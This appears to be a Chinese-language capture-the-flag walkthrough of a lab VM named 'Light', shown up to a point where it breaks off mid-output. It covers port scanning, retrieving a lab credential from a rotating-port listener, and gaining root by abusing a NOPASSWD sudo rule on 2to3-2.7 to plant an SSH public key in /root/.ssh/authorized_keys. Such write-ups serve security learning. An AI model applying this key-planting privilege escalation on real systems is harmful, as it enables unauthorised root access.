Light
Light
信息搜集
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(kali㉿kali)-[~/temp/Light]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.10.101:22
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 93:a4:92:55:72:2b:9b:4a:52:66:5c:af:a9:83:3c:fd (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKpc4iyFhIzxDvlJoPvgE9rRlFPOqHm4EkLgqXQkVf31csyjpvJgyZpTgr4gYV3oztsMmQbIj+nFGD+L5pQfaSXtAdxKpqt4D/MnFqVKP6KKGFhATWMCDzGXRaXQyaF7dOq49vkIoptczAU2af2PfwycA3aaI/lNPOYSHPRufkm102lE/lHZzNbXh0yJJXy9RJaqELeAibmqdrHFNpXFT8qAvsQrz/6IKJkia4JLdVbfeMdZBOQ9lIlQg+2VfKXp7pF7kGZKKttIThc8ROqlcOaxlmuC5oKEgFQP7obty1+6fx/QIuNn3D05FeQMqbvJfFZF1dE2IH4WEbFWRGH6w1
| 256 1e:a7:44:0b:2c:1b:0d:77:83:df:1d:9f:0e:30:08:4d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAYupwIuJVRtRMDrYZ6fR/3p5E5vsqXADwGAoZ2RW5vKPxDV3j/+QjGbnRDj1iD5/iwZxxlUggSr5raZfzAHrZA=
| 256 d0:fa:9d:76:77:42:6f:91:d3:bd:b5:44:72:a7:c9:71 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAOshh8VG4l9hWlVYWfAvLuWuwPEdiF8EXmm5BFib/+q
58132/tcp closed unknown reset ttl 64
MAC Address: 08:00:27:07:5C:9B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
扫描一下udp:
1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/temp/Light]
└─$ sudo nmap -sU --top-ports 100 $IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-27 01:31 EDT
Nmap scan report for 192.168.10.101
Host is up (0.00082s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:07:5C:9B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 139.07 seconds
漏洞发现
敏感端口
1
2
3
┌──(kali㉿kali)-[~/temp/Light]
└─$ nc $IP 58132
(UNKNOWN) [192.168.10.101] 58132 (?) : Connection refused
重新扫描:
1
2
3
4
Open 192.168.10.101:22
Open 192.168.10.101:11071
Open 192.168.10.101:45691
Open 192.168.10.101:59838
再扫一次:
1
2
Open 192.168.10.101:22
Open 192.168.10.101:33654
。。。。。。
1
2
3
PORT STATE SERVICE
22/tcp open ssh
33591/tcp open unknown
看一下啥情况。。。。。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
┌──(kali㉿kali)-[~/temp/Light]
└─$ nc $IP 33591
00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452 .PNG........IHDR
00000010: 0000 013f 0000 0085 0806 0000 002d 80ff ...?.........-..
00000020: 0c00 0000 0173 5247 4200 aece 1ce9 0000 .....sRGB.......
00000030: 0004 6741 4d41 0000 b18f 0bfc 6105 0000 ..gAMA......a...
00000040: 0009 7048 5973 0000 0ec3 0000 0ec3 01c7 ..pHYs..........
00000050: 6fa8 6400 0007 de49 4441 5478 5eed dbf7 o.d....IDATx^...
00000060: 9314 4518 c671 ffff 1f2d ab2c 73c0 9cb0 ..E..q...-.,s...
00000070: 0c08 7292 0491 2092 8380 08e2 09ca c1a1 ..r... .........
00000080: 2248 7aed c799 2ea7 a67a 6f7b c3ed edf2 "Hz......zo{....
00000090: 7c3f 5553 1c7d bdd3 d361 9f09 bbf7 5400 |?US.}...a....T.
000000a0: 8021 c20f 8025 c20f 8025 c20f 8025 c20f .!...%...%...%..
000000b0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
000000c0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
000000d0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
000000e0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
000000f0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000100: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000110: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000120: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000130: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000140: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000150: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000160: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000170: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000180: 8025 c20f 8025 c20f 80a5 c50c bf07 0f23 .%...%.........#
00000190: eede 8fb8 d76e fa59 654f 82dc b7bf ff69 .....n.YeO.....i
000001a0: 0b30 538f 1fa7 f14f 63af 4d3f 976c d41c .0S....Oc.M?.l..
000001b0: cda2 5da3 f5b7 98e1 77e4 c788 67b7 45bc ..].....w...g.E.
000001c0: f855 c49b 5f47 bcba 33e2 f8e5 f697 0b4e .U.._G..3......N
000001d0: fd50 7f5e 586a 0b30 5337 ff8a 7869 47b3 .P.^Xj.0S7..xiG.
000001e0: e9e7 928d 9aa3 59b4 6bb4 fe16 ffb6 f78d ......Y.k.......
000001f0: 3d11 efec 8b38 73b5 2d58 703f 2c47 bcbd =....8s.-Xp?,G..
00000200: 37bd f952 b063 f6ee dc8b 782b 9d50 b5e9 7..R.c....x+.P..
00000210: e712 ad35 adb9 4d69 edcd d22c dad5 fadb ...5..Mi...,....
00000220: 88be 6d80 c50f 3f4d d25a e1a7 4bf8 5da7 ..m...?M.Z..K.].
00000230: 2276 9ffe 7f3b d6bb 4abc f27b c49e 54be "v...;..J..{..T.
00000240: e364 5b90 94ca 64dc fd5d 5d29 efaf 4b67 .d[...d..]])..Kg
00000250: dd2d 4722 bef8 3ee2 da6a 5b98 cce2 f826 .-G"..>..j[....&
00000260: d99f fc79 3762 e9f8 daf5 721b fbce ae5d ...y7b....r....]
00000270: 4f4a ed6a fbf2 585b a155 7b7c 35f5 2ea7 OJ.j..X[.U{|5...
00000280: e3d3 fedf dfdf 6c1a 0b1d afea 76db cd21 ......l.....v..!
00000290: f4de 3711 7b3b 7d19 b75d a9e9 ef28 edd6 ..7.{;}..]...(..
000002a0: cc87 74db fdfa 4cb3 f63e 487d ef87 5f4d ..t...L..>H}.._M
000002b0: 3f06 ada1 bfd2 4944 afd5 a69f e7c4 931d ?.....ID........
000002c0: 7eab 779a 4079 6d57 73ab 7cf8 62c4 b6a3 ~.w.@ymWs.|.b...
000002d0: 119f 1c8e b874 bdad 949c baf2 ffed 7356 .....t........sV
000002e0: 2a1b 777f cbb7 9a45 a1b2 97d3 edd4 205f *.w....E...... _
000002f0: a6c5 aa2b 8ea5 136d 416b bd8f 4f6a f7b7 ...+...mAk..Oj..
00000300: 35bd 393e 3e14 71f1 5a5b a9a5 aba4 6fce 5.9>>.q.Z[....o.
00000310: 451c bc30 bc5d f571 ade3 ebb7 ab7d e64d E..0.].q.....}.M
00000320: 6ffa acb6 bfb5 f596 6f36 f3a4 70d1 a690 o.......o6..p...
00000330: 3e54 6837 87d0 bba9 ce34 daad ed6f 6dbb >Th7.....4...om.
00000340: 5233 1fa5 e353 602a f8bb e157 db8f fe1a R3...S`*...W....
00000350: ba72 a379 eded bf23 5edf dd6c b706 3c4a .r.y...#^..l..<J
00000360: d800 4f76 f89d 4c93 a1db e2ee 44fe f04b ..Ov..L.....D..K
00000370: 7b5b d909 a1bc a8ba f54a 65a3 ee4f 0b41 {[.......Je..O.A
00000380: be4a 67c2 8f0f 467c f65d 7356 2d79 f828 .Jg...F|.]sV-y.(
00000390: 627b 5a78 1f7e 9bce c09d 052f eb75 7ce3 b{Zx.~...../.u|.
000003a0: ec4f a1b7 f940 1360 6ba9 6db7 54af d46e .O...@.`k.m.T..n
000003b0: 496d 7f6b eb89 ae4c f26d efa0 ab94 49fa Im.k...L.m....I.
000003c0: 3149 7f6b db2d 19e5 f86a d641 697f fde3 1I.k.-...j.Ai...
000003d0: fb34 adf7 9329 34bb 8f12 1486 73e2 c90e .4...)4.....s...
000003e0: bfd2 6299 76d9 f95f 07d7 fbe8 40c4 335b ..b.v.._....@.3[
000003f0: 23fe 4867 be61 f480 f9ad b498 ce2f b705 #.Hg.a......./..
00000400: 1dd3 3ee6 49ca 6aad 352e c3ca 8eff d45c ..>.I.j.5......\
00000410: 650c 6bb7 f4da da76 4bf5 446f ce61 6fd4 e.k....vK.Do.ao.
00000420: da7e d4b6 3b49 7f4b 6525 93cc c7b8 655f .~..;I.Ke%....e_
00000430: a4ab c333 3f13 7eeb 4603 ad01 d7c0 f74d ...3?.~.F......M
00000440: 7322 2597 e9ea 4c13 996f e114 5add 0f28 s"%...L..o..Z..(
00000450: 723d 9d2d 6ba9 1d6d 27d2 99b2 6f1a c73c r=.-k..m'...o..<
00000460: adb2 4174 95a4 f1c8 9b6e cd34 4ee3 b6a1 ..At.....n.4N...
00000470: 4f5a 5f49 b74f dd71 d615 7457 7e6d ed7c OZ_I.O.q..tW~m.|
00000480: 0cab 27eb 117e 35ed 8ed2 df9a f19b e67c ..'..~5........|
00000490: 8c5b 46f8 ad33 0db4 065c 03df 573b 69f9 .[F..3...\..W;i.
000004a0: 5945 b7ec 5c7b 59af 0599 e5d7 aa7c e5cf YE..\{Y......|..
000004b0: e619 d1af b79a edea 4a5b 2929 b531 8816 ........J[)).1..
000004c0: a91e 34ab 7d9d 9db5 50fa 6afb 318b b292 ..4.}...P.j.1...
000004d0: 9f6f a437 ea89 a69e c6e5 b7db 1107 cf37 .o.7...........7
000004e0: cfcd c66d 43df 37d3 986a 8cb5 bf03 697f ...mC.7..j....i.
000004f0: ba92 de7d aaad 90e4 d7d6 cec7 b07a b21e ...}.........z..
00000500: e157 d3ee 28fd 1dd6 eeb4 e7a3 b6ac ff3e .W..(..........>
00000510: fafc 48aa 97c2 efde 8366 3c79 e637 651a ..H......f<y.7e.
00000520: 684d 8226 a3ef 741a 782d bcd2 a469 22b2 hM.&..t.x-...i".
00000530: 6b69 31ea e1f6 a654 a605 a84f fdf6 a640 ki1....T...O...@
00000540: da7c b079 e09d 95f6 5752 5a18 83e8 0da6 .|.y....WRZ.....
00000550: 7675 9538 e8f6 b8b6 1fd3 a8d7 2d2b d5d3 vu.8........-+..
00000560: e2bd 9042 fa6c 3a39 647a 2654 3a79 f4f7 ...B.l:9dz&T:y..
00000570: 576a a376 acf2 c9a8 fb81 51ed 7cd4 d693 Wj.v......Q.|...
00000580: 5b69 3e34 177a b3ea 417d 496d 3f46 69b7 [i>4.z..A}Im?Fi.
00000590: afd4 dfda 766b e763 9275 90eb 95de 471a ....vk.c.u....G.
000005a0: bf5f 5288 1f4d b7f3 6753 bdd3 69d3 f1e8 ._R..M..gS..i...
000005b0: c392 3bf3 f3e5 e9c5 0cbf ffbe 85de 0ea2 ..;.............
000005c0: 0655 97f4 ba5d d487 06dd 6fa6 eb3b 4b0a .U...]....o..;K.
000005d0: b07c fba9 dfab 9ece 80ba 05e8 d2a4 e843 .|.............C
000005e0: 092d 7a4d b43e 98d8 77ae fd65 abbf bffc .-zM.>..w..e....
000005f0: d725 fab7 abb4 804a 1e3d 8eb8 beda f441 .%.....J.=.....A
00000600: 6daf 0e78 b3d5 f663 d27a 1ac7 ee31 97ea m..x...c.z...1..
00000610: 1dbd d4fc 5f63 94d5 eeaf f6cd 9be7 37ff ...._c........7.
00000620: 054f 6d3f 06cd 476d 3dd1 1c68 2e34 27d7 .Om?..Gm=..h.4'.
00000630: d315 d3fd 74d5 a27a dd75 55db 8fda 766b ....t..z.uU...vk
00000640: fb3b 6ebb a3cc ef28 f54a efa3 fc81 913e .;n....(.J.....>
00000650: f155 5f14 ba7a 5d77 7f73 6231 c34f 6790 .U_..z]w.sb1.Og.
00000660: fc17 1e1a 586d 1a6c fdff e92d 6da5 9626 ....Xm.l...-m..&
00000670: 43cf 57f4 3b6d fa74 4acf 2206 797e a9b9 C.W.;m.tJ.".y~..
00000680: d5d5 d9ae a4bf bfe7 b637 0ba3 4b0f b0b5 .........7..K...
00000690: 0fed 6b2d fafa 80ce 9c35 0ba3 dbae ae14 ..k-.....5......
000006a0: 153e 3b3a b744 596d 7ffb f534 7e1a c7fe .>;:.DYm...4~...
000006b0: 314f 737f a571 2995 75e7 77d4 764b f321 1Os..q).u.w.vK.!
000006c0: b5f5 321d 8fae ba72 fdee baaa ed87 d4b4 ..2....r........
000006d0: 5bdb df49 daad 9ddf 49d7 c14a ba33 503d [..I....I..J.3P=
000006e0: 6d7f dc6d 6e85 4bc7 3707 16ff b677 91e9 m..mn.K.7....w..
000006f0: eca9 f0d3 4219 c5ce 147a ba32 292d 3e00 ....B....z.2)->.
00000700: 5508 bf8d a46f e1eb 01b7 9e33 d6d2 37eb U....o.....3..7.
00000710: f525 d4fd e996 7c8e 1e1e 038b 86f0 9b77 .%....|........w
00000720: fae4 4e9f 025f b8d6 7c63 5eb7 10fa d6bf ..N.._..|c^.....
00000730: 9e15 0218 1be1 37ef f477 927a a8ac bfaa ......7..w.z....
00000740: d0a6 af3f ccd1 2766 c0a2 22fc 0058 22fc ...?..'f.."..X".
00000750: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
00000760: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
00000770: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
00000780: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
00000790: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
000007a0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
000007b0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
000007c0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
000007d0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
000007e0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
000007f0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
00000800: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
00000810: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
00000820: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
00000830: 0018 8af8 1765 703a 66dc e967 bc00 0000 .....ep:f..g....
00000840: 0049 454e 44ae 4260 82 .IEND.B`.
有一个.png文件。。。。。尝试下载的时候:
1
2
3
┌──(kali㉿kali)-[~/temp/Light]
└─$ nc $IP 33591 > temp.png
(UNKNOWN) [192.168.10.101] 33591 (?) : Connection refused
又变了呗。。。。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~/temp/Light]
└─$ nmap $IP -p 1-65535
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-27 01:48 EDT
Nmap scan report for 192.168.10.101
Host is up (0.00047s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
12493/tcp open unknown
MAC Address: 08:00:27:07:5C:9B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 5.62 seconds
┌──(kali㉿kali)-[~/temp/Light]
└─$ nc $IP 12493 > temp.png
拿到凭证lover:youcanseetheshadow:
提权
信息搜集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
lover@light:~$ sudo -l
Matching Defaults entries for lover on light:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lover may run the following commands on light:
(ALL : ALL) NOPASSWD: /usr/bin/2to3-2.7
lover@light:~$ ls -la /usr/bin/2to3-2.7
-rwxr-xr-x 1 root root 96 Oct 10 2019 /usr/bin/2to3-2.7
lover@light:~$ file /usr/bin/2to3-2.7
/usr/bin/2to3-2.7: a /usr/bin/python2.7 script, ASCII text executable
lover@light:~$ cat /usr/bin/2to3-2.7
#! /usr/bin/python2.7
import sys
from lib2to3.main import main
sys.exit(main("lib2to3.fixes"))
lover@light:~$ find / -name "*lib2to3.main*" 2>/dev/null
lover@light:~$ find / -name "*lib2to3*" 2>/dev/null
/usr/lib/python2.7/lib2to3
lover@light:~$ ls -la /usr/lib/python2.7/lib2to3
total 304
drwxr-xr-x 4 root root 4096 Nov 13 2020 .
drwxr-xr-x 26 root root 16384 Nov 13 2020 ..
-rw-r--r-- 1 root root 6834 Oct 10 2019 btm_matcher.py
-rw-r--r-- 1 root root 5808 Nov 13 2020 btm_matcher.pyc
-rw-r--r-- 1 root root 10012 Oct 10 2019 btm_utils.py
-rw-r--r-- 1 root root 7537 Nov 13 2020 btm_utils.pyc
-rw-r--r-- 1 root root 6780 Oct 10 2019 fixer_base.py
-rw-r--r-- 1 root root 7154 Nov 13 2020 fixer_base.pyc
-rw-r--r-- 1 root root 14597 Oct 10 2019 fixer_util.py
-rw-r--r-- 1 root root 14615 Nov 13 2020 fixer_util.pyc
drwxr-xr-x 2 root root 4096 Nov 13 2020 fixes
-rw-r--r-- 1 root root 7094 Oct 10 2019 Grammar.txt
-rw-r--r-- 1 root root 7 Oct 10 2019 __init__.py
-rw-r--r-- 1 root root 125 Nov 13 2020 __init__.pyc
-rw-r--r-- 1 root root 67 Oct 10 2019 __main__.py
-rw-r--r-- 1 root root 11605 Oct 10 2019 main.py
-rw-r--r-- 1 root root 240 Nov 13 2020 __main__.pyc
-rw-r--r-- 1 root root 9811 Nov 13 2020 main.pyc
-rw-r--r-- 1 root root 7065 Oct 10 2019 patcomp.py
-rw-r--r-- 1 root root 6577 Nov 13 2020 patcomp.pyc
-rw-r--r-- 1 root root 793 Oct 10 2019 PatternGrammar.txt
drwxr-xr-x 2 root root 4096 Nov 13 2020 pgen2
-rw-r--r-- 1 root root 1158 Oct 10 2019 pygram.py
-rw-r--r-- 1 root root 1435 Nov 13 2020 pygram.pyc
-rw-r--r-- 1 root root 29039 Oct 10 2019 pytree.py
-rw-r--r-- 1 root root 30151 Nov 13 2020 pytree.pyc
-rw-r--r-- 1 root root 28067 Oct 10 2019 refactor.py
-rw-r--r-- 1 root root 23874 Nov 13 2020 refactor.pyc
lover@light:~$ /usr/bin/2to3-2.7 --help
Usage: 2to3 [options] file|dir ...
Options:
-h, --help show this help message and exit
-d, --doctests_only Fix up doctests only
-f FIX, --fix=FIX Each FIX specifies a transformation; default: all
-j PROCESSES, --processes=PROCESSES
Run 2to3 concurrently
-x NOFIX, --nofix=NOFIX
Prevent a transformation from being run
-l, --list-fixes List available transformations
-p, --print-function Modify the grammar so that print() is a function
-v, --verbose More verbose logging
--no-diffs Don't show diffs of the refactoring
-w, --write Write back modified files
-n, --nobackups Don't write backups for modified files
-o OUTPUT_DIR, --output-dir=OUTPUT_DIR
Put output files in this directory instead of
overwriting the input files. Requires -n.
-W, --write-unchanged-files
Also write files even if no changes were required
(useful with --output-dir); implies -w.
--add-suffix=ADD_SUFFIX
Append this string to all output filenames. Requires
-n if non-empty. ex: --add-suffix='3' will generate
.py3 files.
lover@light:~$ ls -la
total 52
drwxr-xr-x 3 lover lover 4096 Nov 13 2020 .
drwxr-xr-x 3 root root 4096 Nov 13 2020 ..
-rw-r--r-- 1 lover lover 220 Nov 13 2020 .bash_logout
-rw-r--r-- 1 lover lover 3526 Nov 13 2020 .bashrc
-rwxr-xr-x 1 lover lover 1921 Nov 13 2020 flag.sh
drwxr-xr-x 3 lover lover 4096 Nov 13 2020 .local
-rw-r--r-- 1 lover lover 9037 Nov 13 2020 mypass.txt
-rw-r--r-- 1 lover lover 807 Nov 13 2020 .profile
-rwxr-xr-x 1 lover lover 660 Nov 13 2020 tip.py
-rw------- 1 lover lover 17 Nov 13 2020 user.txt
-rw------- 1 lover lover 51 Nov 13 2020 .Xauthority
lover@light:~$ cat flag.sh
#!/bin/bash
echo '\033[0;35m
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, \033[0m'
echo "-------------------------"
echo "\nPWNED HOST: $(hostname)"
echo "\nPWNED DATE: $(date)"
echo "\nWHOAMI: $(id)"
echo "\nFLAG: $(cat root.txt 2>/dev/null || cat user.txt 2>/dev/null || echo "Keep trying.")"
echo "\n------------------------"
lover@light:~$ cat tip.py
#!/usr/bin/env python3
import socket
from random import randint
HOST = '0.0.0.0' # Symbolic name meaning all available interfaces
while True:
allow_reuse_address = True
random = randint(8000,65000)
PORT = random # Arbitrary non-privileged port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(1)
conn, addr = s.accept()
print ("Connected by",addr)
with open('mypass.txt', 'r') as f:
conn.sendall(f.read().encode('utf-8'))
conn.close()
lover@light:~$ cat mypass.txt
00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452 .PNG........IHDR
00000010: 0000 013f 0000 0085 0806 0000 002d 80ff ...?.........-..
00000020: 0c00 0000 0173 5247 4200 aece 1ce9 0000 .....sRGB.......
00000030: 0004 6741 4d41 0000 b18f 0bfc 6105 0000 ..gAMA......a...
00000040: 0009 7048 5973 0000 0ec3 0000 0ec3 01c7 ..pHYs..........
00000050: 6fa8 6400 0007 de49 4441 5478 5eed dbf7 o.d....IDATx^...
00000060: 9314 4518 c671 ffff 1f2d ab2c 73c0 9cb0 ..E..q...-.,s...
----------------
lover@light:~$ cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
cat: /etc/cron.weekly: Is a directory
lover@light:~$ crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
@reboot python /home/lover/tip.py
覆写公钥
似乎是一个将 python2 程序转换成 python3 程序的库,拥有写入权限,尝试写入替换公钥:
1
2
3
4
text = '''
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCX4CxFTzX3/H4eZNPPElW0lQUQaQkaM+CPykvpX1WA6DKHCxaFCkN22uR/+o0COklnUr0DcJjfOwJa+FdG4XD2sbZ7HLlf5/5QCapABB5ImRKm3S8nnkB5N08DFiflK4ua9KRnRFb1+M9rgbXLyGu0RErtCla6cY2hpe9ue+Iwj4FrT1gtnLfhVTTWYK6X+q4p/UIRTukE1465+d7MacxEPpmvh9S12b/mmL50LmrRLNSGC94KoqpMFmh4S04AxjdicMUJvnw6GSeORztY1MErdlUm4ZbAleFFQlZqVod+dTNe7jXpHZTw9S42koS2Ydso+XcXI48/T/7N796aw8PVrveOzB8Yj92iJa/N1dmvnWBPuZnrqTDNAsUbcRhU48fF+v0HvOseXGVuYxpu1C+kCOcy6P9xPDL7MnJ8TM0yPEW8M1rFt6bMZuPkVadYJHWhRBz1ThZBonjG7OOcE//P426gFbjRe66qFw2eKJeg2Qihtx89UgZNDRWOtDC20VM= kali@kali
'''
print text
然后尝试强行写入:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
lover@light:/tmp$ sudo /usr/bin/2to3-2.7 -w -n authorized_keys -o /root/.ssh/authorized_keys
lib2to3.main: Output in '/root/.ssh/authorized_keys' will mirror the input directory '' layout.
RefactoringTool: Skipping optional fixer: buffer
RefactoringTool: Skipping optional fixer: idioms
RefactoringTool: Skipping optional fixer: set_literal
RefactoringTool: Skipping optional fixer: ws_comma
RefactoringTool: Refactored authorized_keys
--- authorized_keys (original)
+++ authorized_keys (refactored)
@@ -1,4 +1,4 @@
text = '''
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCX4CxFTzX3/H4eZNPPElW0lQUQaQkaM+CPykvpX1WA6DKHCxaFCkN22uR/+o0COklnUr0DcJjfOwJa+FdG4XD2sbZ7HLlf5/5QCapABB5ImRKm3S8nnkB5N08DFiflK4ua9KRnRFb1+M9rgbXLyGu0RErtCla6cY2hpe9ue+Iwj4FrT1gtnLfhVTTWYK6X+q4p/UIRTukE1465+d7MacxEPpmvh9S12b/mmL50LmrRLNSGC94KoqpMFmh4S04AxjdicMUJvnw6GSeORztY1MErdlUm4ZbAleFFQlZqVod+dTNe7jXpHZTw9S42koS2Ydso+XcXI48/T/7N796aw8PVrveOzB8Yj92iJa/N1dmvnWBPuZnrqTDNAsUbcRhU48fF+v0HvOseXGVuYxpu1C+kCOcy6P9xPDL7MnJ8TM0yPEW8M1rFt6bMZuPkVadYJHWhRBz1ThZBonjG7OOcE//P426gFbjRe66qFw2eKJeg2Qihtx89UgZNDRWOtDC20VM= kali@kali
'''
-print text
+print(text)
RefactoringTool: Writing converted authorized_keys to /root/.ssh/authorized_keys/authorized_keys.
RefactoringTool: Files that were modified:
RefactoringTool: authorized_keys
尝试连接一下,但是失败了。。。。是我使用方法有问题,它是写入了一个名为authorized_keys目录。。。。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
lover@light:/tmp$ sudo /usr/bin/2to3-2.7 -w -n authorized_keys -o /root/.ssh/
lib2to3.main: Output in '/root/.ssh/' will mirror the input directory '' layout.
RefactoringTool: Skipping optional fixer: buffer
RefactoringTool: Skipping optional fixer: idioms
